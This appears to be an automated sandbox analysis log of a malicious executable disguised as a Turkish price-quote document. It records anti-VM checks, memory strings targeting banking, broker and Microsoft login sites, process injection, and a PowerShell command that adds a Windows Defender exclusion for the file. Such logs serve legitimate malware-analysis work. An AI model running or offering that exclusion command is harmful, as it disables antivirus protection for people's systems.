Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 596336	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 596219	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 593985	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 593860	Jump to behavior

Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3870008957.0000000003E97000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3870008957.0000000003E97000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3870008957.0000000003E97000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3870008957.0000000003E97000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3870008957.0000000003E97000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3870008957.0000000003E97000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3870008957.0000000003E97000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3864468214.0000000001037000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlls>
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3870008957.0000000003E97000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3870008957.0000000003E97000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3870008957.0000000003E97000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3870008957.0000000003E97000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3870008957.0000000003E97000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000001.00000002.1455846229.0000000007547000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3870008957.0000000003E97000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3870008957.0000000003E97000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3870008957.0000000003E97000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3870008957.0000000003E97000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3870008957.0000000003E97000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3870008957.0000000003E97000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3870008957.0000000003E97000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3870008957.0000000003E97000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000001.00000002.1455846229.0000000007547000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3870008957.0000000003E97000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3870008957.0000000003E97000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3870008957.0000000003E97000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3870008957.0000000003E97000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3870008957.0000000003E97000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3870008957.0000000003E97000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3870008957.0000000003E97000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3870008957.0000000003E97000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3870008957.0000000003E97000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3870008957.0000000003E97000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3870008957.0000000003E97000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE

Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe

Code function: 4_2_059B97B0 LdrInitializeThunk,

4_2_059B97B0

Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe"
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe"			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe

Memory written: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe"			Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Process created: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe "C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe"			Jump to behavior

Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3866206375.0000000002EBD000.00000004.00000800.00020000.00000000.sdmp, #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3866206375.0000000002EE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR
Source: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3866206375.0000000002EBD000.00000004.00000800.00020000.00000000.sdmp, #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe, 00000004.00000002.3866206375.0000000002EE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager

Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Queries volume information: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Queries volume information: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
